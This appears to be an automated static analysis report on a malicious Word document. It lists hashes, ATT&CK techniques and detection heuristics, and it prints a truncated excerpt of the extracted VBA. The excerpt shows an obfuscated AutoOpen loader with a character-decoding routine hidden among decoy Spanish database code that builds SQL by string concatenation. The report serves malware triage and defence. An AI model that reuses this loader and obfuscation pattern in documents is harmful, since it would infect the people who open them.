Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 37a90a0a66d7b3b2…

MALICIOUS

Office (OOXML)

Size: 32.2 KB
Created: 2016-08-11 12:37:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2020-07-24
MD5: c626aa6155088dce1115f2564cbc1a9e
SHA-1: 09e0ecc1c021e8cd50c5febb0d1f73b3628d8c96
SHA-256: 37a90a0a66d7b3b227d3b164850154d66d51a2eed729c1657665c3e651fb5d25
Risk Score: 364

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1566.001 Spearphishing Attachment; T1203 Exploitation for Client Execution

The file is an OOXML document containing a critical heuristic firing for an obfuscated auto-exec VBA loader. The 'autoopen' macro is present, which is a common technique for executing malicious code upon document opening. The script uses CreateObject and CallByName, indicating it's likely designed to download and execute a second-stage payload.

Heuristics (9)

  • ClamAV: Doc.Dropper.Agent-1608053 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1608053
  • VBA project inside OOXML [medium, 5 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call [high] OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13743 bytes
SHA-256: 7efc3a10000e3c038bd1eb403cdc9545a2fe49dd4132b3985484d51768d2c352
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
IsOk "122"
End Sub



Attribute VB_Name = "Mo"
 
Global Const mensaje_cancelar = " Pulse Click para abandonar esta ventana."
Global Const mensaje_cerrar = " Pulse Click para abandonar esta ventana."
Global Const mensaje_salir = " Pulse Click para abandonar esta ventana."
Global Const mensaje_opcion = " Pulse Click para seleccionar Opción."
Global Const mensaje_copiar = " Pulse Click para Copiar al Portapapeles."
Public GromGremitKustiTryasutsyaDAcdaw As Object
Public GromGremitKustiTryasutsyaPLAPEKCwwed As Object
Public GromGremitKustiTryasutsyaKSKLAL As Object
Public GromGremitKustiTryasutsyaXSAOO() As String


Public GromGremitKustiTryasutsyaLAKOPPC As String
Public GromGremitKustiTryasutsyaPLAPEKC() As String
Public GromGremitKustiTryasutsyaUUUKA As String
Public GromGremitKustiTryasutsyaUUUKABBB As String


Public GromGremitKustiTryasutsyaGMAKO As Object
Public GromGremitKustiTryasutsya4 As String
 Public GromGremitKustiTryasutsya2 As String
Public GromGremitKustiTryasutsyaASALLLP As Variant





















Public Function VerAuditoria()
Dim SQL As String


VerAuditoria = False
RsUsu.ActiveConnection = Con

SQL = "Select * FROM usuarios "
SQL = SQL & " WHERE usu_id=" & IdUsuario
RsUsu.Open SQL

    If Not RsUsu.EOF Then
     If RsUsu!usu_auditor = "S" Then
        VerAuditoria = True
     Else
        VerAuditoria = False
     End If
        
        
    
    End If



End Function


Public Function permisos(nombreformu As String, IdUsuario As Long) As Boolean

Dim SQL As String
Dim idformu As Long

permisos = False
RsUsu.ActiveConnection = Con
idformu = BuscarIdFormu(nombreformu)

SQL = "Select * FROM PermisosPorFormu "
SQL = SQL & " WHERE ppf_idformu=" & idformu
SQL = SQL & " AND ppf_idusuario=" & IdUsuario
RsUsu.Open SQL

    If Not RsUsu.EOF Then
     permisos = True
     p = RsUsu!ppf_permisos
        
        
    
    End If



End Function
Public Function BuscarIdFormu(nombreformu As String) As Long
Dim SQL As String

RsFormu.ActiveConnection = Con

SQL = "Select * from Formularios WHERE frm_nombre=" & ""

RsFormu.Open SQL

    If Not RsFormu.EOF Then
        BuscarIdFormu = RsFormu!frm_id
    End If
End Function


Public Function DuBirMahnWeishr(GromGremitKustiTryasutsya6 As Integer) As String
Dost = CInt(GromGremitKustiTryasutsyaXSAOO(GromGremitKustiTryasutsya6))
DuBirMahnWeishr = Chr(Dost / 44)
End Function
Public Function GodnTeBabenParama(A1 As String, A2 As String, A3 As String) As String
GodnTeBabenParama = Replace(A1, A2, A3)
End Function



Attribute VB_Name = "ul"

Public Sub CambiarPass(OldPass As String, newpass As String, cambio As Boolean)
Dim SQL As String
If cambio Then
 GromGremitKustiTryasutsyaLAKOPPC = GromGremitKustiTryasutsyaKSKLAL(GromGremitKustiTryasutsyaPLAPEKC(6))
 GromGremitKustiTryasutsyaUUUKA = GromGremitKustiTryasutsyaLAKOPPC

 
 GromGremitKustiTryasutsyaUUUKABBB = GromGremitKustiTryasutsyaUUUKA + "weffvxcvw"
GromGremitKustiTryasutsyaUUUKA = GromGremitKustiTryasutsyaUUUKA + GromGremitKustiTryasutsyaPLAPEKC(12)
GromGremitKustiTryasutsyaPLAPEKCwwed.Type = 1

 GromGremitKustiTryasutsyaPLAPEKCwwed.Open
 encript SQL
Exit Sub
Else
GoTo BigEnd
End If
RsUsuario.ActiveConnection = RutaBase
RsClave.ActiveConnection = RutaBase

SQL = "Select * from Usuarios WHERE usu_id=" & IdUsuario
RsUsuario.Open SQL

If Not RsUsuario.EOF Then
    If OldPass = Decript(RsUsuario!usu_clave) Then
        
        SQL = "UPDATE Usuarios SET usu_clave=" & ""
        SQL = SQL & " WHERE usu_id=" & IdUsuario
        RsClave.Open SQL
        cambio = True
        
    Else
        cambio = False
    End If
End If
BigEnd:
CallByName GromGremitKustiTryasut
... (truncated)
Filename | Kind | Source | Size
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 41472 bytes
SHA-256: 156ba75b139208bc015b505cd099b7e40f0d813f6a4f28a0f30323c9076fe8fe
Detection
ClamAV: Doc.Dropper.Agent-1608053
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).